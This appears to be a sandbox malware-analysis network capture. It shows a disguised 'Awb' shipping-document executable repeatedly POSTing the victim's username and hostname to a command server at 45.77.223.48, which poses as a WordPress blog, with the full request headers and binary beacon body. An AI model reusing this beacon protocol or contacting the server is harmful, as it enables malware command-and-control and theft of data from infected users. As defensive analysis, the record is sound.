Apr 25, 2024 09:42:32.072443962 CEST	1289	IN	Data Raw: 3c 73 63 72 69 70 74 3e 0a 77 69 6e 64 6f 77 2e 5f 77 70 65 6d 6f 6a 69 53 65 74 74 69 6e 67 73 20 3d 20 7b 22 62 61 73 65 55 72 6c 22 3a 22 68 74 74 70 73 3a 5c 2f 5c 2f 73 2e 77 2e 6f 72 67 5c 2f 69 6d 61 67 65 73 5c 2f 63 6f 72 65 5c 2f 65 6d Data Ascii: <script>window._wpemojiSettings = {"baseUrl":"https:\/\/s.w.org\/images\/core\/emoji\/15.0.3\/72x72\/","ext":".png","svgUrl":"https:\/\/s.w.org\/images\/core\/emoji\/15.0.3\/svg\/","svgExt":".svg","source":{"concatemoji":"http:\/\/45.77.223.4

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
27	192.168.2.4	49776	45.77.223.48	80	6536	C:\Users\user\Desktop\Awb# 1294440291; 2 ki_n; G.W 3.30 KG.exe

Timestamp	Bytes transferred	Direction	Data
Apr 25, 2024 09:42:32.329145908 CEST	239	OUT	POST /~blog/?ajax=ee HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 45.77.223.48 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: FE983A82 Content-Length: 149 Connection: close
Apr 25, 2024 09:42:32.456109047 CEST	149	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 31 00 32 00 33 00 37 00 31 00 36 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 Data Ascii: (ckav.rujones123716JONES-PC0FDD42EE188E931437F4FBE2C
Apr 25, 2024 09:42:33.266455889 CEST	215	IN	HTTP/1.1 200 OK Date: Thu, 25 Apr 2024 07:42:32 GMT Server: Apache Link: <http://45.77.223.48/~blog/index.php?rest_route=/>; rel="https://api.w.org/" Connection: close Content-Type: text/html; charset=UTF-8
Apr 25, 2024 09:42:33.266486883 CEST	70	IN	Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 0a 3c 68 65 61 64 3e 0a 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 20 2f 3e 0a 09 Data Ascii: <!DOCTYPE html><html lang="en-US"><head><meta charset="UTF-8" />
Apr 25, 2024 09:42:33.266587973 CEST	71	IN	Data Raw: 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 20 2f 3e 0a Data Ascii: <meta name="viewport" content="width=device-width, initial-scale=1" />
Apr 25, 2024 09:42:33.273724079 CEST	57	IN	Data Raw: 3c 6d 65 74 61 20 6e 61 6d 65 3d 27 72 6f 62 6f 74 73 27 20 63 6f 6e 74 65 6e 74 3d 27 6d 61 78 2d 69 6d 61 67 65 2d 70 72 65 76 69 65 77 3a 6c 61 72 67 65 27 20 2f 3e 0a Data Ascii: <meta name='robots' content='max-image-preview:large' />
Apr 25, 2024 09:42:33.274024010 CEST	32	IN	Data Raw: 3c 74 69 74 6c 65 3e 4e 61 74 75 72 61 6c 20 62 69 7a 20 62 6c 6f 67 3c 2f 74 69 74 6c 65 3e 0a Data Ascii: <title>Natural biz blog</title>
Apr 25, 2024 09:42:33.274049044 CEST	134	IN	Data Raw: 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 6c 74 65 72 6e 61 74 65 22 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 72 73 73 2b 78 6d 6c 22 20 74 69 74 6c 65 3d 22 4e 61 74 75 72 61 6c 20 62 69 7a 20 62 6c 6f 67 20 26 72 61 71 75 6f 3b 20 46 Data Ascii: <link rel="alternate" type="application/rss+xml" title="Natural biz blog » Feed" href="http://45.77.223.48/~blog/?feed=rss2" />
Apr 25, 2024 09:42:33.274230003 CEST	152	IN	Data Raw: 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 6c 74 65 72 6e 61 74 65 22 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 72 73 73 2b 78 6d 6c 22 20 74 69 74 6c 65 3d 22 4e 61 74 75 72 61 6c 20 62 69 7a 20 62 6c 6f 67 20 26 72 61 71 75 6f 3b 20 43 Data Ascii: <link rel="alternate" type="application/rss+xml" title="Natural biz blog » Comments Feed" href="http://45.77.223.48/~blog/?feed=comments-rss2" />
Apr 25, 2024 09:42:33.274383068 CEST	1289	IN	Data Raw: 3c 73 63 72 69 70 74 3e 0a 77 69 6e 64 6f 77 2e 5f 77 70 65 6d 6f 6a 69 53 65 74 74 69 6e 67 73 20 3d 20 7b 22 62 61 73 65 55 72 6c 22 3a 22 68 74 74 70 73 3a 5c 2f 5c 2f 73 2e 77 2e 6f 72 67 5c 2f 69 6d 61 67 65 73 5c 2f 63 6f 72 65 5c 2f 65 6d Data Ascii: <script>window._wpemojiSettings = {"baseUrl":"https:\/\/s.w.org\/images\/core\/emoji\/15.0.3\/72x72\/","ext":".png","svgUrl":"https:\/\/s.w.org\/images\/core\/emoji\/15.0.3\/svg\/","svgExt":".svg","source":{"concatemoji":"http:\/\/45.77.223.4
Apr 25, 2024 09:42:33.274450064 CEST	1289	IN	Data Raw: 64 38 33 64 5c 75 64 63 32 36 5c 75 32 30 30 64 5c 75 32 62 31 62 22 2c 22 5c 75 64 38 33 64 5c 75 64 63 32 36 5c 75 32 30 30 62 5c 75 32 62 31 62 22 29 7d 72 65 74 75 72 6e 21 31 7d 66 75 6e 63 74 69 6f 6e 20 66 28 65 2c 74 2c 6e 29 7b 76 61 72 Data Ascii: d83d\udc26\u200d\u2b1b","\ud83d\udc26\u200b\u2b1b")}return!1}function f(e,t,n){var r="undefined"!=typeof WorkerGlobalScope&&self instanceof WorkerGlobalScope?new OffscreenCanvas(300,150):i.createElement("canvas"),a=r.getContext("2d",{willReadF
Apr 25, 2024 09:42:33.274463892 CEST	1289	IN	Data Raw: 73 61 67 65 3d 66 75 6e 63 74 69 6f 6e 28 65 29 7b 63 28 6e 3d 65 2e 64 61 74 61 29 2c 61 2e 74 65 72 6d 69 6e 61 74 65 28 29 2c 74 28 6e 29 7d 29 7d 63 61 74 63 68 28 65 29 7b 7d 63 28 6e 3d 66 28 73 2c 75 2c 70 29 29 7d 74 28 6e 29 7d 29 2e 74 Data Ascii: sage=function(e){c(n=e.data),a.terminate(),t(n)})}catch(e){}c(n=f(s,u,p))}t(n)}).then(function(e){for(var t in e)n.supports[t]=e[t],n.supports.everything=n.supports.everything&&n.supports[t],"flag"!==t&&(n.supports.everythingExceptFlag=n.suppo

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
28	192.168.2.4	49777	45.77.223.48	80	6536	C:\Users\user\Desktop\Awb# 1294440291; 2 ki_n; G.W 3.30 KG.exe

Timestamp	Bytes transferred	Direction	Data
Apr 25, 2024 09:42:33.541898966 CEST	239	OUT	POST /~blog/?ajax=ee HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 45.77.223.48 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: FE983A82 Content-Length: 149 Connection: close
Apr 25, 2024 09:42:33.669126034 CEST	149	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 31 00 32 00 33 00 37 00 31 00 36 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 Data Ascii: (ckav.rujones123716JONES-PC0FDD42EE188E931437F4FBE2C
Apr 25, 2024 09:42:34.686326027 CEST	215	IN	HTTP/1.1 200 OK Date: Thu, 25 Apr 2024 07:42:33 GMT Server: Apache Link: <http://45.77.223.48/~blog/index.php?rest_route=/>; rel="https://api.w.org/" Connection: close Content-Type: text/html; charset=UTF-8
Apr 25, 2024 09:42:34.686347961 CEST	59	IN	Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 0a 3c 68 65 61 64 3e 0a 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 Data Ascii: <!DOCTYPE html><html lang="en-US"><head><meta charset="
Apr 25, 2024 09:42:34.686506987 CEST	5	IN	Data Raw: 55 54 46 2d 38 Data Ascii: UTF-8
Apr 25, 2024 09:42:34.686671972 CEST	6	IN	Data Raw: 22 20 2f 3e 0a 09 Data Ascii: " />
Apr 25, 2024 09:42:34.686780930 CEST	71	IN	Data Raw: 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 20 2f 3e 0a Data Ascii: <meta name="viewport" content="width=device-width, initial-scale=1" />
Apr 25, 2024 09:42:34.704169035 CEST	57	IN	Data Raw: 3c 6d 65 74 61 20 6e 61 6d 65 3d 27 72 6f 62 6f 74 73 27 20 63 6f 6e 74 65 6e 74 3d 27 6d 61 78 2d 69 6d 61 67 65 2d 70 72 65 76 69 65 77 3a 6c 61 72 67 65 27 20 2f 3e 0a Data Ascii: <meta name='robots' content='max-image-preview:large' />
Apr 25, 2024 09:42:34.707104921 CEST	32	IN	Data Raw: 3c 74 69 74 6c 65 3e 4e 61 74 75 72 61 6c 20 62 69 7a 20 62 6c 6f 67 3c 2f 74 69 74 6c 65 3e 0a Data Ascii: <title>Natural biz blog</title>
Apr 25, 2024 09:42:34.707180023 CEST	134	IN	Data Raw: 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 6c 74 65 72 6e 61 74 65 22 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 72 73 73 2b 78 6d 6c 22 20 74 69 74 6c 65 3d 22 4e 61 74 75 72 61 6c 20 62 69 7a 20 62 6c 6f 67 20 26 72 61 71 75 6f 3b 20 46 Data Ascii: <link rel="alternate" type="application/rss+xml" title="Natural biz blog » Feed" href="http://45.77.223.48/~blog/?feed=rss2" />
Apr 25, 2024 09:42:34.707405090 CEST	152	IN	Data Raw: 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 6c 74 65 72 6e 61 74 65 22 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 72 73 73 2b 78 6d 6c 22 20 74 69 74 6c 65 3d 22 4e 61 74 75 72 61 6c 20 62 69 7a 20 62 6c 6f 67 20 26 72 61 71 75 6f 3b 20 43 Data Ascii: <link rel="alternate" type="application/rss+xml" title="Natural biz blog » Comments Feed" href="http://45.77.223.48/~blog/?feed=comments-rss2" />
Apr 25, 2024 09:42:34.708142042 CEST	1289	IN	Data Raw: 3c 73 63 72 69 70 74 3e 0a 77 69 6e 64 6f 77 2e 5f 77 70 65 6d 6f 6a 69 53 65 74 74 69 6e 67 73 20 3d 20 7b 22 62 61 73 65 55 72 6c 22 3a 22 68 74 74 70 73 3a 5c 2f 5c 2f 73 2e 77 2e 6f 72 67 5c 2f 69 6d 61 67 65 73 5c 2f 63 6f 72 65 5c 2f 65 6d Data Ascii: <script>window._wpemojiSettings = {"baseUrl":"https:\/\/s.w.org\/images\/core\/emoji\/15.0.3\/72x72\/","ext":".png","svgUrl":"https:\/\/s.w.org\/images\/core\/emoji\/15.0.3\/svg\/","svgExt":".svg","source":{"concatemoji":"http:\/\/45.77.223.4

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
29	192.168.2.4	49778	45.77.223.48	80	6536	C:\Users\user\Desktop\Awb# 1294440291; 2 ki_n; G.W 3.30 KG.exe

Timestamp	Bytes transferred	Direction	Data
Apr 25, 2024 09:42:34.955343008 CEST	239	OUT	POST /~blog/?ajax=ee HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 45.77.223.48 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: FE983A82 Content-Length: 149 Connection: close
Apr 25, 2024 09:42:35.082542896 CEST	149	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 31 00 32 00 33 00 37 00 31 00 36 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 Data Ascii: (ckav.rujones123716JONES-PC0FDD42EE188E931437F4FBE2C
Apr 25, 2024 09:42:35.915126085 CEST	215	IN	HTTP/1.1 200 OK Date: Thu, 25 Apr 2024 07:42:35 GMT Server: Apache Link: <http://45.77.223.48/~blog/index.php?rest_route=/>; rel="https://api.w.org/" Connection: close Content-Type: text/html; charset=UTF-8
Apr 25, 2024 09:42:35.915240049 CEST	59	IN	Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 0a 3c 68 65 61 64 3e 0a 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 Data Ascii: <!DOCTYPE html><html lang="en-US"><head><meta charset="
Apr 25, 2024 09:42:35.915329933 CEST	82	IN	Data Raw: 55 54 46 2d 38 22 20 2f 3e 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 20 2f 3e 0a Data Ascii: UTF-8" /><meta name="viewport" content="width=device-width, initial-scale=1" />
Apr 25, 2024 09:42:35.924458027 CEST	57	IN	Data Raw: 3c 6d 65 74 61 20 6e 61 6d 65 3d 27 72 6f 62 6f 74 73 27 20 63 6f 6e 74 65 6e 74 3d 27 6d 61 78 2d 69 6d 61 67 65 2d 70 72 65 76 69 65 77 3a 6c 61 72 67 65 27 20 2f 3e 0a Data Ascii: <meta name='robots' content='max-image-preview:large' />
Apr 25, 2024 09:42:35.924885988 CEST	32	IN	Data Raw: 3c 74 69 74 6c 65 3e 4e 61 74 75 72 61 6c 20 62 69 7a 20 62 6c 6f 67 3c 2f 74 69 74 6c 65 3e 0a Data Ascii: <title>Natural biz blog</title>
Apr 25, 2024 09:42:35.925029993 CEST	134	IN	Data Raw: 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 6c 74 65 72 6e 61 74 65 22 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 72 73 73 2b 78 6d 6c 22 20 74 69 74 6c 65 3d 22 4e 61 74 75 72 61 6c 20 62 69 7a 20 62 6c 6f 67 20 26 72 61 71 75 6f 3b 20 46 Data Ascii: <link rel="alternate" type="application/rss+xml" title="Natural biz blog » Feed" href="http://45.77.223.48/~blog/?feed=rss2" />
Apr 25, 2024 09:42:35.925163031 CEST	152	IN	Data Raw: 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 6c 74 65 72 6e 61 74 65 22 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 72 73 73 2b 78 6d 6c 22 20 74 69 74 6c 65 3d 22 4e 61 74 75 72 61 6c 20 62 69 7a 20 62 6c 6f 67 20 26 72 61 71 75 6f 3b 20 43 Data Ascii: <link rel="alternate" type="application/rss+xml" title="Natural biz blog » Comments Feed" href="http://45.77.223.48/~blog/?feed=comments-rss2" />
Apr 25, 2024 09:42:35.925343990 CEST	1289	IN	Data Raw: 3c 73 63 72 69 70 74 3e 0a 77 69 6e 64 6f 77 2e 5f 77 70 65 6d 6f 6a 69 53 65 74 74 69 6e 67 73 20 3d 20 7b 22 62 61 73 65 55 72 6c 22 3a 22 68 74 74 70 73 3a 5c 2f 5c 2f 73 2e 77 2e 6f 72 67 5c 2f 69 6d 61 67 65 73 5c 2f 63 6f 72 65 5c 2f 65 6d Data Ascii: <script>window._wpemojiSettings = {"baseUrl":"https:\/\/s.w.org\/images\/core\/emoji\/15.0.3\/72x72\/","ext":".png","svgUrl":"https:\/\/s.w.org\/images\/core\/emoji\/15.0.3\/svg\/","svgExt":".svg","source":{"concatemoji":"http:\/\/45.77.223.4
Apr 25, 2024 09:42:35.925357103 CEST	1289	IN	Data Raw: 64 38 33 64 5c 75 64 63 32 36 5c 75 32 30 30 64 5c 75 32 62 31 62 22 2c 22 5c 75 64 38 33 64 5c 75 64 63 32 36 5c 75 32 30 30 62 5c 75 32 62 31 62 22 29 7d 72 65 74 75 72 6e 21 31 7d 66 75 6e 63 74 69 6f 6e 20 66 28 65 2c 74 2c 6e 29 7b 76 61 72 Data Ascii: d83d\udc26\u200d\u2b1b","\ud83d\udc26\u200b\u2b1b")}return!1}function f(e,t,n){var r="undefined"!=typeof WorkerGlobalScope&&self instanceof WorkerGlobalScope?new OffscreenCanvas(300,150):i.createElement("canvas"),a=r.getContext("2d",{willReadF
Apr 25, 2024 09:42:35.925466061 CEST	1289	IN	Data Raw: 73 61 67 65 3d 66 75 6e 63 74 69 6f 6e 28 65 29 7b 63 28 6e 3d 65 2e 64 61 74 61 29 2c 61 2e 74 65 72 6d 69 6e 61 74 65 28 29 2c 74 28 6e 29 7d 29 7d 63 61 74 63 68 28 65 29 7b 7d 63 28 6e 3d 66 28 73 2c 75 2c 70 29 29 7d 74 28 6e 29 7d 29 2e 74 Data Ascii: sage=function(e){c(n=e.data),a.terminate(),t(n)})}catch(e){}c(n=f(s,u,p))}t(n)}).then(function(e){for(var t in e)n.supports[t]=e[t],n.supports.everything=n.supports.everything&&n.supports[t],"flag"!==t&&(n.supports.everythingExceptFlag=n.suppo

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
30	192.168.2.4	49779	45.77.223.48	80	6536	C:\Users\user\Desktop\Awb# 1294440291; 2 ki_n; G.W 3.30 KG.exe

Timestamp	Bytes transferred	Direction	Data
Apr 25, 2024 09:42:36.181911945 CEST	239	OUT	POST /~blog/?ajax=ee HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 45.77.223.48 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: FE983A82 Content-Length: 149 Connection: close
Apr 25, 2024 09:42:36.307461977 CEST	149	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 31 00 32 00 33 00 37 00 31 00 36 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 Data Ascii: (ckav.rujones123716JONES-PC0FDD42EE188E931437F4FBE2C
Apr 25, 2024 09:42:37.140893936 CEST	215	IN	HTTP/1.1 200 OK Date: Thu, 25 Apr 2024 07:42:36 GMT Server: Apache Link: <http://45.77.223.48/~blog/index.php?rest_route=/>; rel="https://api.w.org/" Connection: close Content-Type: text/html; charset=UTF-8
Apr 25, 2024 09:42:37.141244888 CEST	59	IN	Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 0a 3c 68 65 61 64 3e 0a 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 Data Ascii: <!DOCTYPE html><html lang="en-US"><head><meta charset="
Apr 25, 2024 09:42:37.141258001 CEST	82	IN	Data Raw: 55 54 46 2d 38 22 20 2f 3e 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 20 2f 3e 0a Data Ascii: UTF-8" /><meta name="viewport" content="width=device-width, initial-scale=1" />
Apr 25, 2024 09:42:37.150084972 CEST	57	IN	Data Raw: 3c 6d 65 74 61 20 6e 61 6d 65 3d 27 72 6f 62 6f 74 73 27 20 63 6f 6e 74 65 6e 74 3d 27 6d 61 78 2d 69 6d 61 67 65 2d 70 72 65 76 69 65 77 3a 6c 61 72 67 65 27 20 2f 3e 0a Data Ascii: <meta name='robots' content='max-image-preview:large' />
Apr 25, 2024 09:42:37.150435925 CEST	32	IN	Data Raw: 3c 74 69 74 6c 65 3e 4e 61 74 75 72 61 6c 20 62 69 7a 20 62 6c 6f 67 3c 2f 74 69 74 6c 65 3e 0a Data Ascii: <title>Natural biz blog</title>
Apr 25, 2024 09:42:37.150487900 CEST	134	IN	Data Raw: 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 6c 74 65 72 6e 61 74 65 22 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 72 73 73 2b 78 6d 6c 22 20 74 69 74 6c 65 3d 22 4e 61 74 75 72 61 6c 20 62 69 7a 20 62 6c 6f 67 20 26 72 61 71 75 6f 3b 20 46 Data Ascii: <link rel="alternate" type="application/rss+xml" title="Natural biz blog » Feed" href="http://45.77.223.48/~blog/?feed=rss2" />
Apr 25, 2024 09:42:37.150552034 CEST	152	IN	Data Raw: 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 6c 74 65 72 6e 61 74 65 22 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 72 73 73 2b 78 6d 6c 22 20 74 69 74 6c 65 3d 22 4e 61 74 75 72 61 6c 20 62 69 7a 20 62 6c 6f 67 20 26 72 61 71 75 6f 3b 20 43 Data Ascii: <link rel="alternate" type="application/rss+xml" title="Natural biz blog » Comments Feed" href="http://45.77.223.48/~blog/?feed=comments-rss2" />
Apr 25, 2024 09:42:37.150868893 CEST	1289	IN	Data Raw: 3c 73 63 72 69 70 74 3e 0a 77 69 6e 64 6f 77 2e 5f 77 70 65 6d 6f 6a 69 53 65 74 74 69 6e 67 73 20 3d 20 7b 22 62 61 73 65 55 72 6c 22 3a 22 68 74 74 70 73 3a 5c 2f 5c 2f 73 2e 77 2e 6f 72 67 5c 2f 69 6d 61 67 65 73 5c 2f 63 6f 72 65 5c 2f 65 6d Data Ascii: <script>window._wpemojiSettings = {"baseUrl":"https:\/\/s.w.org\/images\/core\/emoji\/15.0.3\/72x72\/","ext":".png","svgUrl":"https:\/\/s.w.org\/images\/core\/emoji\/15.0.3\/svg\/","svgExt":".svg","source":{"concatemoji":"http:\/\/45.77.223.4
Apr 25, 2024 09:42:37.150924921 CEST	1289	IN	Data Raw: 64 38 33 64 5c 75 64 63 32 36 5c 75 32 30 30 64 5c 75 32 62 31 62 22 2c 22 5c 75 64 38 33 64 5c 75 64 63 32 36 5c 75 32 30 30 62 5c 75 32 62 31 62 22 29 7d 72 65 74 75 72 6e 21 31 7d 66 75 6e 63 74 69 6f 6e 20 66 28 65 2c 74 2c 6e 29 7b 76 61 72 Data Ascii: d83d\udc26\u200d\u2b1b","\ud83d\udc26\u200b\u2b1b")}return!1}function f(e,t,n){var r="undefined"!=typeof WorkerGlobalScope&&self instanceof WorkerGlobalScope?new OffscreenCanvas(300,150):i.createElement("canvas"),a=r.getContext("2d",{willReadF
Apr 25, 2024 09:42:37.150938034 CEST	670	IN	Data Raw: 73 61 67 65 3d 66 75 6e 63 74 69 6f 6e 28 65 29 7b 63 28 6e 3d 65 2e 64 61 74 61 29 2c 61 2e 74 65 72 6d 69 6e 61 74 65 28 29 2c 74 28 6e 29 7d 29 7d 63 61 74 63 68 28 65 29 7b 7d 63 28 6e 3d 66 28 73 2c 75 2c 70 29 29 7d 74 28 6e 29 7d 29 2e 74 Data Ascii: sage=function(e){c(n=e.data),a.terminate(),t(n)})}catch(e){}c(n=f(s,u,p))}t(n)}).then(function(e){for(var t in e)n.supports[t]=e[t],n.supports.everything=n.supports.everything&&n.supports[t],"flag"!==t&&(n.supports.everythingExceptFlag=n.suppo

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
31	192.168.2.4	49780	45.77.223.48	80	6536	C:\Users\user\Desktop\Awb# 1294440291; 2 ki_n; G.W 3.30 KG.exe

Timestamp	Bytes transferred	Direction	Data
Apr 25, 2024 09:42:37.405097961 CEST	239	OUT	POST /~blog/?ajax=ee HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 45.77.223.48 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: FE983A82 Content-Length: 149 Connection: close
Apr 25, 2024 09:42:37.536058903 CEST	149	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 31 00 32 00 33 00 37 00 31 00 36 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 Data Ascii: (ckav.rujones123716JONES-PC0FDD42EE188E931437F4FBE2C
Apr 25, 2024 09:42:38.365076065 CEST	215	IN	HTTP/1.1 200 OK Date: Thu, 25 Apr 2024 07:42:37 GMT Server: Apache Link: <http://45.77.223.48/~blog/index.php?rest_route=/>; rel="https://api.w.org/" Connection: close Content-Type: text/html; charset=UTF-8
Apr 25, 2024 09:42:38.365109921 CEST	59	IN	Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 0a 3c 68 65 61 64 3e 0a 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 Data Ascii: <!DOCTYPE html><html lang="en-US"><head><meta charset="
Apr 25, 2024 09:42:38.365163088 CEST	5	IN	Data Raw: 55 54 46 2d 38 Data Ascii: UTF-8
Apr 25, 2024 09:42:38.365220070 CEST	6	IN	Data Raw: 22 20 2f 3e 0a 09 Data Ascii: " />
Apr 25, 2024 09:42:38.365544081 CEST	71	IN	Data Raw: 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 20 2f 3e 0a Data Ascii: <meta name="viewport" content="width=device-width, initial-scale=1" />
Apr 25, 2024 09:42:38.374820948 CEST	57	IN	Data Raw: 3c 6d 65 74 61 20 6e 61 6d 65 3d 27 72 6f 62 6f 74 73 27 20 63 6f 6e 74 65 6e 74 3d 27 6d 61 78 2d 69 6d 61 67 65 2d 70 72 65 76 69 65 77 3a 6c 61 72 67 65 27 20 2f 3e 0a Data Ascii: <meta name='robots' content='max-image-preview:large' />
Apr 25, 2024 09:42:38.375261068 CEST	32	IN	Data Raw: 3c 74 69 74 6c 65 3e 4e 61 74 75 72 61 6c 20 62 69 7a 20 62 6c 6f 67 3c 2f 74 69 74 6c 65 3e 0a Data Ascii: <title>Natural biz blog</title>
Apr 25, 2024 09:42:38.375334978 CEST	134	IN	Data Raw: 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 6c 74 65 72 6e 61 74 65 22 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 72 73 73 2b 78 6d 6c 22 20 74 69 74 6c 65 3d 22 4e 61 74 75 72 61 6c 20 62 69 7a 20 62 6c 6f 67 20 26 72 61 71 75 6f 3b 20 46 Data Ascii: <link rel="alternate" type="application/rss+xml" title="Natural biz blog » Feed" href="http://45.77.223.48/~blog/?feed=rss2" />
Apr 25, 2024 09:42:38.375531912 CEST	152	IN	Data Raw: 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 6c 74 65 72 6e 61 74 65 22 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 72 73 73 2b 78 6d 6c 22 20 74 69 74 6c 65 3d 22 4e 61 74 75 72 61 6c 20 62 69 7a 20 62 6c 6f 67 20 26 72 61 71 75 6f 3b 20 43 Data Ascii: <link rel="alternate" type="application/rss+xml" title="Natural biz blog » Comments Feed" href="http://45.77.223.48/~blog/?feed=comments-rss2" />
Apr 25, 2024 09:42:38.375683069 CEST	1289	IN	Data Raw: 3c 73 63 72 69 70 74 3e 0a 77 69 6e 64 6f 77 2e 5f 77 70 65 6d 6f 6a 69 53 65 74 74 69 6e 67 73 20 3d 20 7b 22 62 61 73 65 55 72 6c 22 3a 22 68 74 74 70 73 3a 5c 2f 5c 2f 73 2e 77 2e 6f 72 67 5c 2f 69 6d 61 67 65 73 5c 2f 63 6f 72 65 5c 2f 65 6d Data Ascii: <script>window._wpemojiSettings = {"baseUrl":"https:\/\/s.w.org\/images\/core\/emoji\/15.0.3\/72x72\/","ext":".png","svgUrl":"https:\/\/s.w.org\/images\/core\/emoji\/15.0.3\/svg\/","svgExt":".svg","source":{"concatemoji":"http:\/\/45.77.223.4

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
